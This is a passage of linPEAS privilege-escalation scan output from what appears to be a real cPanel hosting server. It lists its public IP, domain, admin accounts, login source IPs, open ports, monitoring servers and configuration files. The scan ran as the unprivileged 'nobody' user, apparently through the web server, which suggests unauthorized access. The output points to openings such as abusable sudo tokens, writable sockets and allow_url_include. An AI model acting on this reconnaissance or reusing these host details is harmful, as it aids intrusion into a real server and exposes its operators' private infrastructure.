chrony ntp tcpdump ctrl4c nagios ctrlsadmin systemd-bus-proxy systemd-network clamupdate ╔══════════╣ System timers β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#timers NEXT LEFT LAST PASSED UNIT ACTIVATES Sat 2025-05-24 03:16:22 IST 9h left Fri 2025-05-23 03:16:22 IST 14h ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service n/a n/a n/a n/a systemd-readahead-done.timer systemd-readahead-done.service ╔══════════╣ Analyzing .timer files β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#timers  ╔══════════╣ Analyzing .service files β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#services /etc/systemd/system/multi-user.target.wants/abrt-oops.service could be executing some relative path /etc/systemd/system/multi-user.target.wants/abrt-xorg.service could be executing some relative path /etc/systemd/system/multi-user.target.wants/named.service could be executing some relative path You can't write on systemd PATH ╔══════════╣ Analyzing .socket files β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets /usr/lib/systemd/system/dbus.socket is calling this writable listener: /run/dbus/system_bus_socket /usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /run/dbus/system_bus_socket /usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout /usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket /usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /dev/log /usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout /usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket /usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /dev/log ╔══════════╣ Unix Sockets Listening β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets sed: -e expression #1, char 0: no previous regular expression /dev/log └─(Read Write) /run/cphulkd.sock /run/cphulkd_db.sock └─(Read ) /run/dbus/system_bus_socket └─(Read Write) /run/dovecot/anvil /run/dovecot/anvil-auth-penalty /run/dovecot/auth-client └─(Read Write) /run/dovecot/auth-login /run/dovecot/auth-master /run/dovecot/auth-userdb └─(Read Write) /run/dovecot/auth-worker /run/dovecot/config /run/dovecot/dict /run/dovecot/dict-async /run/dovecot/director-admin /run/dovecot/dns-client └─(Read Write) /run/dovecot/doveadm-server /run/dovecot/imap-hibernate /run/dovecot/imap-master /run/dovecot/imap-urlauth └─(Read Write) /run/dovecot/imap-urlauth-worker /run/dovecot/indexer └─(Read Write) /run/dovecot/indexer-worker /run/dovecot/ipc /run/dovecot/lmtp /run/dovecot/log-errors /run/dovecot/master /run/dovecot/old-stats /run/dovecot/quota-status └─(Read Write) /run/dovecot/replication-notify /run/dovecot/replicator /run/dovecot/stats-reader /run/dovecot/stats-writer └─(Read Write) /run/ftpd.sock /run/gssproxy.sock └─(Read Write) /run/lsm/ipc/sim └─(Read Write) /run/lsm/ipc/simc └─(Read Write) /run/lvm/lvmetad.socket /run/lvm/lvmpolld.socket /run/rpcbind.sock └─(Read Write) /run/sw-engine.sock /run/systemd/cgroups-agent /run/systemd/journal/socket └─(Read Write) /run/systemd/journal/stdout └─(Read Write) /run/systemd/notify └─(Read Write) /run/systemd/private └─(Read Write) /run/systemd/shutdownd /run/udev/control /usr/local/cpanel/var/cpauthd.sock └─(Read Write) /usr/local/cpanel/var/cpdoveauth_domainownerd.sock /usr/local/cpanel/var/cpdoveauthd.sock /usr/local/cpanel/var/cpwrapd.sock └─(Read Write) /var/cpanel/dnsadmin/sock /var/cpanel/php-fpm/cpanelphpmyadmin/sock /var/cpanel/php-fpm/cpanelroundcube/sock /var/cpanel/php-fpm/miisky/sock /var/cpanel/userhomes/cpanelconnecttrack/p0f.socket /var/lib/gssproxy/default.sock └─(Read Write) /var/lib/mysql/mysql.sock └─(Read Write) /var/run/cphulkd.sock /var/run/cphulkd_db.sock └─(Read ) /var/run/dovecot/anvil /var/run/dovecot/anvil-auth-penalty /var/run/dovecot/auth-client └─(Read Write) /var/run/dovecot/auth-login /var/run/dovecot/auth-master /var/run/dovecot/auth-userdb └─(Read Write) /var/run/dovecot/auth-worker /var/run/dovecot/config /var/run/dovecot/dict /var/run/dovecot/dict-async /var/run/dovecot/director-admin /var/run/dovecot/dns-client └─(Read Write) /var/run/dovecot/doveadm-server /var/run/dovecot/imap-hibernate /var/run/dovecot/imap-master /var/run/dovecot/imap-urlauth └─(Read Write) /var/run/dovecot/imap-urlauth-worker /var/run/dovecot/indexer └─(Read Write) /var/run/dovecot/indexer-worker /var/run/dovecot/ipc /var/run/dovecot/lmtp /var/run/dovecot/log-errors /var/run/dovecot/login/dns-client /var/run/dovecot/login/imap /var/run/dovecot/login/ipc-proxy /var/run/dovecot/login/login /var/run/dovecot/login/pop3 /var/run/dovecot/login/stats-writer /var/run/dovecot/master /var/run/dovecot/old-stats /var/run/dovecot/quota-status └─(Read Write) /var/run/dovecot/replication-notify /var/run/dovecot/replicator /var/run/dovecot/stats-reader /var/run/dovecot/stats-writer └─(Read Write) /var/run/dovecot/token-login/imap-urlauth /var/run/dovecot/token-login/tokenlogin /var/run/ftpd.sock /var/run/lsm/ipc/sim └─(Read Write) /var/run/lsm/ipc/simc └─(Read Write) /var/run/rpcbind.sock └─(Read Write) /var/run/sw-engine.sock ╔══════════╣ D-Bus Service Objects list β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#d-bus NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION :1.0 872 systemd-logind root :1.0 systemd-logind.service - - :1.1 1 systemd root :1.1 - - - :1.15 1675 tuned root :1.15 tuned.service - - :1.1568 13531 abrt-dbus root :1.1568 dbus.service - - :1.1577 27490 busctl nobody :1.1577 httpd.service - - :1.2 891 polkitd polkitd :1.2 polkit.service - - com.redhat.problems.configuration - - - (activatable) - - com.redhat.tuned 1675 tuned root :1.15 tuned.service - - fi.epitest.hostap.WPASupplicant - - - (activatable) - - fi.w1.wpa_supplicant1 - - - (activatable) - - net.reactivated.Fprint - - - (activatable) - - org.freedesktop.DBus 893 dbus-daemon  dbus org.freedesktop.DBus dbus.service - - org.freedesktop.NetworkManager - - - (activatable) - - org.freedesktop.PolicyKit1 891 polkitd polkitd :1.2 polkit.service - - org.freedesktop.hostname1 - - - (activatable) - - org.freedesktop.import1 - - - (activatable) - - org.freedesktop.locale1 - - - (activatable) - - org.freedesktop.login1 872 systemd-logind root :1.0 systemd-logind.service - - org.freedesktop.machine1 - - - (activatable) - - org.freedesktop.nm_dispatcher - - - (activatable) - - org.freedesktop.problems 13531 abrt-dbus root :1.1568 dbus.service - - -- UID=0 EUID=0 org.freedesktop.systemd1 1 systemd root :1.1 - - - org.freedesktop.timedate1 - - - (activatable) - - org.gnome.GConf.Defaults - - - (activatable) - - ╔══════════╣ D-Bus config files β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#d-bus Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.PolicyKit1.conf ( )  ╔═════════════════════╗ ══════════════════════════════╣ Network Information ╠══════════════════════════════  β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β• ╔══════════╣ Interfaces default 0.0.0.0 loopback 127.0.0.0 link-local 169.254.0.0 eth0: flags=4163 mtu 1500 inet 45.127.102.254 netmask 255.255.255.0 broadcast 45.127.102.255 inet6 fe80::8034:cfff:fe7e:40ad prefixlen 64 scopeid 0x20 ether 82:34:cf:7e:40:ad txqueuelen 1000 (Ethernet) RX packets 8246738 bytes 863002711 (823.0 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 2564343 bytes 6023041821 (5.6 GiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73 mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10 loop txqueuelen 1000 (Local Loopback) RX packets 45316 bytes 8912760 (8.4 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 45316 bytes 8912760 (8.4 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 ╔══════════╣ Hostname, hosts and DNS ns1.miisky.com 127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4 ::1 localhost localhost.localdomain localhost6 localhost6.localdomain6 103.1.113.81 satellite.ctrls.in 103.1.113.81 satellite.ctrls.in 45.127.102.254 ns1.miisky.com ns1 ns1.aarms.com 45.127.102.250 ns1 search miisky.com nameserver 8.8.8.8 miisky.com ╔══════════╣ Active Ports β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:2077 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:2078 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:993 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:2082 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:10050 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:579 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:2083 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:2086 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:2087 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:2091 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:587 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:783 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:2095 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:2096 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:465 0.0.0.0:* LISTEN - tcp 0 0 45.127.102.254:53 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:2232 0.0.0.0:* LISTEN - tcp6 0 0 :::25 :::* LISTEN - tcp6 0 0 :::443 :::* LISTEN - tcp6 0 0 :::993 :::* LISTEN - tcp6 0 0 :::10050 :::* LISTEN - tcp6 0 0 :::995 :::* LISTEN - tcp6 0 0 :::18984 :::* LISTEN - tcp6 0 0 :::3306 :::* LISTEN - tcp6 0 0 :::587 :::* LISTEN - tcp6 0 0 :::110 :::* LISTEN - tcp6 0 0 :::143 :::* LISTEN - tcp6 0 0 ::1:783 :::* LISTEN - tcp6 0 0 :::111 :::* LISTEN - tcp6 0 0 127.0.0.1:7984 :::* LISTEN - tcp6 0 0 :::80 :::* LISTEN - tcp6 0 0 :::465 :::* LISTEN - tcp6 0 0 :::21 :::* LISTEN - tcp6 0 0 127.0.0.1:8984 :::* LISTEN - tcp6 0 0 :::46232 :::* LISTEN - tcp6 0 0 :::2232 :::* LISTEN - ╔══════════╣ Can I sniff with tcpdump? No   ╔═══════════════════╗ ═══════════════════════════════╣ Users Information ╠═══════════════════════════════  β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β• ╔══════════╣ My user β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#users uid=99(nobody) gid=99(nobody) groups=99(nobody) ╔══════════╣ Do I have PGP keys? /bin/gpg netpgpkeys Not Found netpgp Not Found  ╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid  ╔══════════╣ Checking sudo tokens β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#reusing-sudo-tokens ptrace protection is disabled (0), so sudo tokens could be abused gdb was found in PATH ╔══════════╣ Checking Pkexec policy β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html#pe---method-2  ╔══════════╣ Superusers root:x:0:0:root:/root:/bin/bash ╔══════════╣ Users with console cloud4c:x:1003:1007::/home/cloud4c:/bin/bash ctrlsadmin:x:1001:1003::/home/ctrlsadmin:/bin/bash mailman:x:989:984:GNU Mailing List Manager:/usr/local/cpanel/3rdparty/mailman:/bin/bash mysql:x:988:983:MySQL server:/var/lib/mysql:/bin/bash nagios:x:1000:1001::/home/nagios:/bin/bash root:x:0:0:root:/root:/bin/bash ╔══════════╣ All users & groups uid=0(root) gid=0(root) groups=0(root),995(mysyslog) uid=1(bin) gid=1(bin) groups=1(bin) uid=1000(nagios) gid=1001(nagios) groups=1001(nagios),1002(nagcmd) uid=1001(ctrlsadmin) gid=1003(ctrlsadmin) groups=1003(ctrlsadmin) uid=1002(miisky) gid=1006(miisky) groups=1006(miisky) uid=1003(cloud4c) gid=1007(cloud4c) groups=1007(cloud4c) uid=11(operator) gid=0(root) groups=0(root) uid=12(games) gid=100(users) groups=100(users) uid=14(ftp) gid=50(ftp) groups=50(ftp) uid=170(avahi-autoipd) gid=170(avahi-autoipd) groups=170(avahi-autoipd) uid=173(abrt) gid=173(abrt) groups=173(abrt) uid=2(daemon[0m) gid=2(daemon[0m) groups=2(daemon[0m),995(mysyslog) uid=201(cpanelroundcube) gid=201(cpanelroundcube) groups=201(cpanelroundcube) uid=202(cpanel) gid=202(cpanel) groups=202(cpanel),995(mysyslog),977(compiler) uid=203(cpanelcabcache) gid=203(cpanelcabcache) groups=203(cpanelcabcache) uid=204(cpanelphppgadmin) gid=204(cpanelphppgadmin) groups=204(cpanelphppgadmin) uid=205(cpanelrrdtool) gid=205(cpanelrrdtool) groups=205(cpanelrrdtool) uid=25(named) gid=25(named) groups=25(named),995(mysyslog) uid=28(nscd) gid=28(nscd) groups=28(nscd) uid=29(rpcuser) gid=29(rpcuser) groups=29(rpcuser) uid=3(adm) gid=4(adm) groups=4(adm) uid=32(rpc) gid=32(rpc) groups=32(rpc),995(mysyslog) uid=38(ntp) gid=38(ntp) groups=38(ntp),995(mysyslog) uid=4(lp) gid=7(lp) groups=7(lp) uid=47(mailnull) gid=47(mailnull) groups=47(mailnull),995(mysyslog) uid=48(apache) gid=48(apache) groups=48(apache) uid=5(sync) gid=0(root) groups=0(root) uid=59(tss) gid=59(tss) groups=59(tss) uid=6(shutdown) gid=0(root) groups=0(root) uid=65534(nfsnobody) gid=65534(nfsnobody) groups=65534(nfsnobody) uid=7(halt) gid=0(root) groups=0(root) uid=72(tcpdump) gid=72(tcpdump) groups=72(tcpdump) uid=74(sshd) gid=74(sshd) groups=74(sshd) uid=8(mail) gid=12(mail) groups=12(mail),995(mysyslog) uid=81(dbus) gid=81(dbus) groups=81(dbus),995(mysyslog) uid=89(postfix) gid=89(postfix) groups=89(postfix),12(mail) uid=97(dovecot) gid=97(dovecot) groups=97(dovecot),995(mysyslog) uid=979(wp-toolkit) gid=971(wp-toolkit) groups=971(wp-toolkit) uid=980(sw-cp-server) gid=972(sw-cp-server) groups=972(sw-cp-server) uid=981(cpanelanalytics) gid=975(cpanelanalytics) groups=975(cpanelanalytics) uid=982(cpanelsolr) gid=976(cpanelsolr) groups=976(cpanelsolr) uid=983(cpses) gid=978(cpses) groups=978(cpses),995(mysyslog) uid=984(cpanelconnecttrack) gid=979(cpanelconnecttrack) groups=979(cpanelconnecttrack) uid=985(cpaneleximscanner) gid=980(cpaneleximscanner) groups=980(cpaneleximscanner) uid=986(cpaneleximfilter) gid=981(cpaneleximfilter) groups=981(cpaneleximfilter) uid=987(cpanellogin) gid=982(cpanellogin) groups=982(cpanellogin) uid=988(mysql) gid=983(mysql) groups=983(mysql),995(mysyslog) uid=989(mailman) gid=984(mailman) groups=984(mailman),995(mysyslog) uid=99(nobody) gid=99(nobody) groups=99(nobody) uid=990(cpanelphpmyadmin) gid=985(cpanelphpmyadmin) groups=985(cpanelphpmyadmin) uid=991(dovenull) gid=987(dovenull) groups=987(dovenull),995(mysyslog) uid=992(zabbix) gid=989(zabbix) groups=989(zabbix) uid=993(nrpe) gid=990(nrpe) groups=990(nrpe),1001(nagios) uid=994(clamupdate) gid=991(clamupdate) groups=991(clamupdate),988(virusgroup) uid=995(systemd-network) gid=992(systemd-network) groups=992(systemd-network) uid=996(systemd-bus-proxy) gid=993(systemd-bus-proxy) groups=993(systemd-bus-proxy) uid=997(chrony) gid=996(chrony) groups=996(chrony) uid=998(libstoragemgmt) gid=997(libstoragemgmt) groups=997(libstoragemgmt) uid=999(polkitd) gid=998(polkitd) groups=998(polkitd),995(mysyslog) ╔══════════╣ Login now  17:20:22 up 14:19, 0 users, load average: 7.09, 5.91, 3.40 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT ╔══════════╣ Last logons reboot system boot Sun Jan 5 03:00:57 2025 - Wed Jan 8 03:00:10 2025 (2+23:59) 0.0.0.0 reboot system boot Sat Jan 4 03:00:58 2025 - Sun Jan 5 03:00:11 2025 (23:59) 0.0.0.0 reboot system boot Fri Jan 3 03:02:22 2025 - Sun Jan 5 03:00:11 2025 (1+23:57) 0.0.0.0 reboot system boot Thu Jan 2 03:00:56 2025 - Fri Jan 3 03:01:31 2025 (1+00:00) 0.0.0.0 reboot system boot Wed Jan 1 03:00:51 2025 - Thu Jan 2 03:00:11 2025 (23:59) 0.0.0.0 reboot system boot Tue Dec 31 03:00:56 2024 - Thu Jan 2 03:00:11 2025 (1+23:59) 0.0.0.0 reboot system boot Mon Dec 30 03:00:54 2024 - Thu Jan 2 03:00:11 2025 (2+23:59) 0.0.0.0 reboot system boot Sun Dec 29 03:00:59 2024 - Thu Jan 2 03:00:11 2025 (3+23:59) 0.0.0.0 wtmp begins Sun Dec 29 03:00:01 2024 ╔══════════╣ Last time logon each user Username Port From Latest root pts/0 103.241.182.128 Mon Jan 27 16:21:44 +0530 2025 ctrlsadmin pts/0 202.65.148.252 Mon Apr 18 15:50:10 +0530 2016 miisky pts/0 182.18.148.97 Wed Jul 3 23:13:26 +0530 2024 wp-toolkit Sun May 18 02:47:33 +0530 2025 cloud4c pts/1 103.241.182.128 Wed Feb 5 10:45:37 +0530 2025 ╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)  ╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!    ╔══════════════════════╗ ═════════════════════════════╣ Software Information ╠═════════════════════════════  β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β• ╔══════════╣ Useful software /bin/base64 /bin/curl /bin/g++ /bin/gcc /bin/gdb /bin/lua /bin/make /bin/perl /usr/local/bin/php /bin/ping /bin/python /bin/python2 /bin/python2.7 /bin/sudo /bin/wget ╔══════════╣ Installed Compilers gcc.x86_64 4.8.5-36.el7_6.2 @updates gcc-c++.x86_64 4.8.5-36.el7_6.2 @updates gcc-gfortran.x86_64 4.8.5-36.el7_6.2 @updates /bin/gcc /bin/g++ ╔══════════╣ Analyzing Apache-Nginx Files (limit 70) Apache version: apache2 Not Found Server version: Apache/2.4.39 (cPanel) Server built: Jul 1 2019 21:24:05 Nginx version: nginx Not Found  /etc/apache2/conf/mime.types-x-conference/x-cooltalk ice /etc/apache2/conf/mime.types:application/x-httpd-php php php3 php4 php5 php6 -- /etc/apache2/conf/mime.types-application/ruby rb /etc/apache2/conf/mime.types:application/x-httpd-php-source phps Binary file /etc/apache2/modules/mod_suphp.so matches ══╣ PHP exec extensions  -rw-r--r-- 1 root root 64945 Nov 6 2016 /etc/php.ini allow_url_fopen = On allow_url_include = Off odbc.allow_persistent = On ibase.allow_persistent = 1 mysql.allow_local_infile = On mysql.allow_persistent = On mysqli.allow_persistent = On pgsql.allow_persistent = On sybct.allow_persistent = On mssql.allow_persistent = On -rw-r--r-- 1 root root 429 May 12 20:39 /etc/sw-engine/conf.d/php.ini -rw-r--r-- 1 root root 65884 Sep 18 2017 /opt/cpanel/ea-php55/root/etc/php.ini allow_url_fopen = On allow_url_include = On odbc.allow_persistent = On ibase.allow_persistent = On mysql.allow_local_infile = On mysql.allow_persistent = On mysqli.allow_persistent = On pgsql.allow_persistent = On sybct.allow_persistent = On mssql.allow_persistent = On -rw-r--r-- 1 root root 65889 Sep 18 2017 /opt/cpanel/ea-php56/root/etc/php.ini allow_url_fopen = On allow_url_include = On odbc.allow_persistent = On ibase.allow_persistent = On mysql.allow_local_infile = On mysql.allow_persistent = On mysqli.allow_persistent = On pgsql.allow_persistent = On sybct.allow_persistent = On mssql.allow_persistent = On -rw-r--r-- 1 root root 60898 Aug 31 2017 /opt/cpanel/ea-php70/root/etc/php.ini allow_url_fopen = Off allow_url_include = Off odbc.allow_persistent = On ibase.allow_persistent = On mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root root 38279 Aug 7 2017 /usr/local/lib/php.ini allow_url_fopen = On odbc.allow_persistent = On mysql.allow_persistent = On msql.allow_persistent = On pgsql.allow_persistent = On sybase.allow_persistent = On mssql.allow_persistent = On ingres.allow_persistent = On ╔══════════╣ Analyzing Mongo Files (limit 70) Version: mongo Not Found mongod Not Found  -rw-r--r-- 1 root root 2279 May 11 2017 /etc/fail2ban/filter.d/mongodb-auth.conf [Definition] failregex = ^\s+\[conn(?P<__connid>\d+)\] Failed to authenticate [^\n]+\s+\[conn(?P=__connid)\] end connection ignoreregex = [Init] maxlines = 10 ╔══════════╣ Analyzing Rsync Files (limit 70) -rw-r--r-- 1 root root 458 Apr 25 2019 /etc/rsyncd.conf ╔══════════╣ Analyzing Wifi Connections Files (limit 70) drwxr-xr-x. 2 root root 6 Mar 14 2019 /etc/NetworkManager/system-connections drwxr-xr-x. 2 root root 6 Mar 14 2019 /etc/NetworkManager/system-connections ╔══════════╣ Analyzing PAM Auth Files (limit 70) drwxr-xr-x. 2 root root 4096 May 1 22:26 /etc/pam.d -rw-r--r-- 1 root root 943 May 1 22:26 /etc/pam.d/sshd auth required pam_sepermit.so auth substack password-auth auth include postlogin -auth optional pam_reauthorize.so prepare account required pam_nologin.so account include password-auth password include password-auth session required pam_selinux.so close session required pam_loginuid.so session required pam_selinux.so open env_params session required pam_namespace.so session optional pam_keyinit.so force revoke session include password-auth session include postlogin -session optional pam_reauthorize.so prepare auth required pam_shells.so ╔══════════╣ Analyzing NFS Exports Files (limit 70) Connected NFS Mounts: sunrpc /var/lib/nfs/rpc_pipefs rpc_pipefs rw,relatime 0 0 none /proc/xen xenfs rw,relatime 0 0 -rw-r--r-- 1 root root 0 Jun 7 2013 /etc/exports ╔══════════╣ Analyzing VNC Files (limit 70)  -rw-r--r-- 1 root root 475 Oct 31 2018 /usr/lib/firewalld/services/vnc-server.xml    Virtual Network Computing Server (VNC)  A VNC server provides an external accessible X session. Enable this option if you plan to provide a VNC server with direct access. The access will be possible for displays :0 to :3. If you plan to provide access with SSH, do not open this option and use the via option of the VNC viewer.    ╔══════════╣ Analyzing Postfix Files (limit 70) drwx------. 2 postfix root 24 Jun 17 2015 /var/lib/postfix find: '/var/lib/postfix': Permission denied drwxr-xr-x. 5 root root 48 Aug 7 2017 /var/spool/postfix find: '/var/spool/postfix/maildrop': Permission denied find: '/var/spool/postfix/private': Permission denied find: '/var/spool/postfix/public': Permission denied ╔══════════╣ Analyzing Http conf Files (limit 70) -rw------- 1 root root 28833 Apr 22 21:04 /etc/apache2/conf/httpd.conf -rw-r--r-- 1 root root 11753 Apr 12 2017 /etc/httpd/conf/httpd.conf -rw-r--r-- 1 root root 77 Apr 12 2017 /usr/lib/tmpfiles.d/httpd.conf lrwxrwxrwx 1 root root 28 Aug 7 2017 /usr/local/apache/conf/httpd.conf -> /etc/apache2/conf/httpd.conf ╔══════════╣ Analyzing Zabbix Files (limit 70)  -rw-r--r-- 1 root root 10443 Oct 20 2023 /etc/zabbix/zabbix_agentd.conf PidFile=/var/run/zabbix/zabbix_agentd.pid LogFile=/var/log/zabbix/zabbix_agentd.log LogFileSize=0 Server=202.65.152.133,43.242.124.92,43.242.124.80 Hostname=Aarms56114-snapshotrestore_Linux_45.127.102.254 HostMetadata=4CHYD-CentOS Include=/etc/zabbix/zabbix_agentd.d/ drwxr-xr-x 3 root root 114 Oct 20 2023 /etc/zabbix drwxr-xr-x 4 nobody nobody 4096 May 23 16:46 /tmp/yum-nobody-GKUGT1/x86_64/7/zabbix drwxr-xr-x 4 root root 4096 May 23 11:09 /var/cache/yum/x86_64/7/zabbix drwx------ 2 root root 6 Jun 2 2017 /var/lib/yum/repos/x86_64/7/zabbix find: '/var/lib/yum/repos/x86_64/7/zabbix': Permission denied drwxr-xr-x 2 zabbix zabbix 4096 May 18 04:19 /var/log/zabbix drwxr-xr-x 4 nobody nobody 4096 May 23 16:46 /var/tmp/yum-nobody-GKUGT1/x86_64/7/zabbix ╔══════════╣ Analyzing Svn Files (limit 70) drwxr-xr-x 6 nagios nagios 92 Aug 3 2015 /usr/local/nagios/etc/nrpe/.svn /usr/local/nagios/etc/nrpe/.svn: total 8 -r--r--r-- 1 nagios nagios 462 Aug 3 2015 all-wcprops -r--r--r-- 1 nagios nagios 553 Aug 3 2015 entries drwxr-xr-x 2 nagios nagios 6 Aug 3 2015 prop-base drwxr-xr-x 2 nagios nagios 6 Aug 3 2015 props drwxr-xr-x 2 nagios nagios 60 Aug 3 2015 text-base drwxr-xr-x 5 nagios nagios 50 Aug 3 2015 tmp /usr/local/nagios/etc/nrpe/.svn/prop-base: total 0 /usr/local/nagios/etc/nrpe/.svn/props: total 0 /usr/local/nagios/etc/nrpe/.svn/text-base: total 8 -r--r--r-- 1 nagios nagios 687 Aug 3 2015 asterisk.cfg.svn-base -r--r--r-- 1 nagios nagios 1309 Aug 3 2015 common.cfg.svn-base /usr/local/nagios/etc/nrpe/.svn/tmp: total 0 drwxr-xr-x 2 nagios nagios 6 Aug 3 2015 prop-base drwxr-xr-x 2 nagios nagios 6 Aug 3 2015 props drwxr-xr-x 2 nagios nagios 6 Aug 3 2015 text-base /usr/local/nagios/etc/nrpe/.svn/tmp/prop-base: total 0 /usr/local/nagios/etc/nrpe/.svn/tmp/props: total 0 /usr/local/nagios/etc/nrpe/.svn/tmp/text-base: total 0 ╔══════════╣ Analyzing FTP Files (limit 70) -rw-r--r-- 1 root root 637 May 11 2017 /etc/fail2ban/filter.d/vsftpd.conf -rw-r--r-- 1 root root 47 Jul 24 2019 /opt/cpanel/ea-php55/root/etc/php.d/ftp.ini -rw-r--r-- 1 root root 47 Jul 24 2019 /opt/cpanel/ea-php56/root/etc/php.d/ftp.ini ╔══════════╣ Analyzing DNS Files (limit 70) drwxr-xr-x 2 root root 6 Jul 29 2019 /usr/lib64/bind drwxr-xr-x 2 root root 6 Jul 29 2019 /usr/lib64/bind ╔══════════╣ Analyzing Interesting logs Files (limit 70)  -rw------- 1 root root 0 Dec 3 2017 /opt/cpanel/ea-php55/root/usr/var/log/php-fpm/error.log -rw------- 1 root root 0 Dec 3 2017 /opt/cpanel/ea-php56/root/usr/var/log/php-fpm/error.log -rw------- 1 root root 0 Dec 3 2017 /opt/cpanel/ea-php70/root/usr/var/log/php-fpm/error.log ╔══════════╣ Analyzing Other Interesting Files (limit 70) -rw-r--r-- 1 root root 231 Oct 30 2018 /etc/skel/.bashrc ╔══════════╣ Analyzing Windows Files (limit 70)  -rw-r--r-- 1 root root 136 Feb 10 2021 /etc/my.cnf -rw-r--r-- 1 root root 348 Jan 5 2021 /usr/share/mysql-test/suite/federated/my.cnf -rw-r--r-- 1 root root 1060 Jan 5 2021 /usr/share/mysql-test/suite/ndb/my.cnf -rw-r--r-- 1 root root 1551 Jan 5 2021 /usr/share/mysql-test/suite/ndb_big/my.cnf -rw-r--r-- 1 root root 664 Jan 5 2021 /usr/share/mysql-test/suite/ndb_binlog/my.cnf -rw-r--r-- 1 root root 2127 Jan 5 2021 /usr/share/mysql-test/suite/ndb_rpl/my.cnf -rw-r--r-- 1 root root 828 Jan 5 2021 /usr/share/mysql-test/suite/ndb_team/my.cnf -rw-r--r-- 1 root root 191 Jan 5 2021 /usr/share/mysql-test/suite/rpl/extension/bhs/my.cnf -rw-r--r-- 1 root root 179 Jan 5 2021 /usr/share/mysql-test/suite/rpl/my.cnf -rw-r--r-- 1 root root 2127 Jan 5 2021 /usr/share/mysql-test/suite/rpl_ndb/my.cnf -rw-r--r-- 1 root root 475 Oct 31 2018 /usr/lib/firewalld/services/vnc-server.xml ╔══════════╣ Searching kerberos conf files and tickets β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/linux-active-directory.html#linux-active-directory ptrace protection is disabled (0), you might find tickets inside processes memory -rw-r--r-- 1 root root 641 Jan 29 2019 /etc/krb5.conf # Configuration snippets may be placed in this directory as well includedir /etc/krb5.conf.d/ [logging] default = FILE:/var/log/krb5libs.log kdc = FILE:/var/log/krb5kdc.log admin_server = FILE:/var/log/kadmind.log [libdefaults] dns_lookup_realm = false ticket_lifetime = 24h renew_lifetime = 7d forwardable = true rdns = false pkinit_anchors = /etc/pki/tls/certs/ca-bundle.crt # default_realm = EXAMPLE.COM default_ccache_name = KEYRING:persistent:%{uid} [realms] # EXAMPLE.COM = { # kdc = kerberos.example.com # admin_server = kerberos.example.com # } [domain_realm] # .example.com = EXAMPLE.COM # example.com = EXAMPLE.COM -rw-r--r-- 1 root root 369 Jan 29 2019 